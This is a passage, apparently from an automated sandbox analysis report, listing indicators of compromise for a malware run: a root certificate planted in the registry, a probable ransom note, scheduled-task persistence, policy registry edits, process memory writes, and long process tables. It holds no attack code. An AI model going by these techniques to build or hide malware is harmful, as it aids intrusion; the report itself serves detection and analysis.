3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	setup.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
2232	NOTEPAD.EXE
5044	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4884	schtasks.exe
5516	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5056	chrome.exe
5056	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
4116	chrome.exe
5584	msedge.exe
5584	msedge.exe
5336	msedge.exe
5336	msedge.exe
5352	identity_helper.exe
5352	identity_helper.exe
4628	chrome.exe
4628	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3028	chrome.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
3652	Ide.com
2896	Officials.com
2896	Officials.com
2896	Officials.com
2896	Officials.com
2896	Officials.com
2896	Officials.com
2896	Officials.com

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4628	chrome.exe
3680	OpenWith.exe

Suspicious behavior: LoadsDriver 10 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
656	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe
Token: SeShutdownPrivilege	5056	chrome.exe
Token: SeCreatePagefilePrivilege	5056	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5056	chrome.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
5336	msedge.exe
3136	AgentSvr.exe
3136	AgentSvr.exe
3136	AgentSvr.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
1508	BonziBuddy432.exe
5164	MSAGENT.EXE
5184	tv_enua.exe
5232	AgentSvr.exe
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
2356	winrar-x64-701.exe
2356	winrar-x64-701.exe
3604	Setup.exe
4788	wget.exe
5328	Setup.exe
6020	wget.exe
4908	winrar.exe
1104	wget.exe
5848	winrar.exe
3812	wget.exe
5156	winrar.exe
3772	winrar.exe
5140	22040691
5832	22040691
3652	Ide.com
5216	c4652134bb.exe
2896	Officials.com
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
4344	Delta V3.61 b_95073919.exe
3504	SearchApp.exe
4912	mspaint.exe
3680	OpenWith.exe

Suspicious use of UnmapMainImage 8 IoCs

pid	Process
5424	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
2604	RobloxPlayerBeta.exe
2508	RobloxPlayerBeta.exe
1548	RobloxPlayerBeta.exe
3192	RobloxPlayerBeta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5056 wrote to memory of 3956	5056	chrome.exe	83
PID 5056 wrote to memory of 3956	5056	chrome.exe	83
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3968	5056	chrome.exe	84
PID 5056 wrote to memory of 3748	5056	chrome.exe	85
PID 5056 wrote to memory of 3748	5056	chrome.exe	85
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86
PID 5056 wrote to memory of 1756	5056	chrome.exe	86

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1"	setup.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\getapp.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff704fcc40,0x7fff704fcc4c,0x7fff704fcc58
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:3968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  PID:3748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2496 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4356,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4480 /prefetch:1
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4432,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4668 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4912,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
  2⤵
  PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5140,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:4048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5300,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5456,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:1
  2⤵
  PID:2324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4472,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5488,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5868,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:3024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=208,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3832 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4748,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5844,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6036,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5252 /prefetch:1
  2⤵
  PID:2256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6196,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6292,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6192 /prefetch:1
  2⤵
  PID:3584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6296,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=7100,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7068,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5352,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
